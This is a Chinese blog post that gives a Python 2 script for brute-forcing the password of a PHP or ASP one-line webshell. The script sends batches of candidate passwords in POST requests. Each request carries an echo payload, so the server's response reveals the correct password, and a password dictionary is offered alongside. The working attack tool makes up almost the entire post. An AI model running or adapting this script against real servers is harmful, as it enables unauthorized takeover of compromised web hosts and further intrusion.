快速一句话爆破Python脚本

作者: Luan 分类: 编程开发 发布时间: 2017-04-01 15:59

继续搬运下以前的文章….

 

使用接地气提供的思路:https://forum.90sec.org/forum.php?mod=viewthread&tid=10120

url = "http://127.0.0.1/a.php"
shell_type = "php"
dic_filename = "WebshellPassword.txt"
php_payload = 'echo base64_decode(Y29kZV9ieV9sdWFu)."%password%".base64_decode(Y29kZV9ieV9sdWFu);'
asp_payload = 'Response.Write("code_"+"by"+"_luan%password%"+"code_"+"by"+"_luan")'
length = 1000
import urllib,urllib2
def post(url,data):
    try:
            req = urllib2.Request(url,urllib.urlencode(data))
            req.add_header("User-Agent","Code By Luan // Blog:Lu4n.com")
            response = urllib2.urlopen(req).read()
            print "Find Password : " + response.split("code_by_luan")[1]
    except Exception,e:
        return ""
print "Webshell Password Burp"
passwords = list(open(dic_filename))
for i in range(0,len(passwords),length):
        exploit = {}
        for password in passwords[i:i+length]:
                password = password.strip('\n').replace("%domain%",url.split("/")[2]).replace("%domain_no_dot%",url.split("/")[2].replace(".",""))
                exploit [password] = eval(shell_type + '_payload.replace("%password%",password)')
        if post(url,exploit) != "":
                break

修改基本参数可爆破asp,php的一句话,也可以自己添加更多的验证一句话的各种脚本代码
附上一个测试字典:
WebshellPassword.txt

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注